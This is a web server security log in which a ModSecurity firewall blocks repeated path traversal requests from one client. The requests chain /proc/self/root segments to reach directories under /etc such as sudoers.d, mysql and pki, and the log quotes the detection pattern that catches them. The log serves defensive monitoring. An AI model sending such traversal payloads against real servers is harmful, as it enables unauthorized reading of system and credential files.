[Tue Mar 17 10:24:06.669827 2026] [:error] [pid 18709:tid 140411641214720] [client 74.7.243.203:38666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV9jarLhPAjZGI1b2zjwAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:07.985906 2026] [:error] [pid 18604:tid 140411725141760] [client 74.7.243.203:38678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV90Bd0UqwxWindINtaQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:09.331981 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:38692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV-e82sZHvlq4xgHrIbQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:11.623385 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:44696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV-weiSKl8TjouI-YHFgAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:13.039222 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:44708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV_aBJNF7axNlVR0UCAwAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:14.383494 2026] [:error] [pid 1731:tid 140411616036608] [client 74.7.243.203:44720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV_gb2qCuy5irgBMjNzQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:15.698394 2026] [:error] [pid 18709:tid 140411590858496] [client 74.7.244.31:55606] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablV_zarLhPAjZGI1b2zkQAAA5I"]
[Tue Mar 17 10:24:16.833425 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:44730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWAAeiSKl8TjouI-YHGAAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:18.202811 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.203:44742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWAq4xEDsg_V3ESNY4qQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:19.501457 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:44758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWA9CmCSWTlPouqorRVAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:20.673393 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:39146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWBAeiSKl8TjouI-YHGgAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:22.018039 2026] [:error] [pid 18604:tid 140411666392832] [client 74.7.243.203:39162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWBkBd0UqwxWindINtcwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:23.374734 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:39170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWB6BJNF7axNlVR0UCBgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:25.912495 2026] [:error] [pid 1731:tid 140411574073088] [client 74.7.243.203:39180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWCQb2qCuy5irgBMjN0AAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:27.328206 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:39194] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWCweiSKl8TjouI-YHGwAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:29.602738 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.243.203:39198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWDK4xEDsg_V3ESNY4rAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:30.915541 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.203:36200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWDqt8Nd0UC_OcbVG0jwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:33.875420 2026] [:error] [pid 18709:tid 140411674785536] [client 74.7.243.203:36216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWETarLhPAjZGI1b2zlgAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:35.162660 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:36222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWE-82sZHvlq4xgHrIcwAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:36.385889 2026] [:error] [pid 18604:tid 140411674785536] [client 74.7.243.203:36234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWFEBd0UqwxWindINtdgAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:37.725385 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.243.203:36238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWFa4xEDsg_V3ESNY4rQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:38.887562 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:36250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablWFqBJNF7axNlVR0UCCQAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
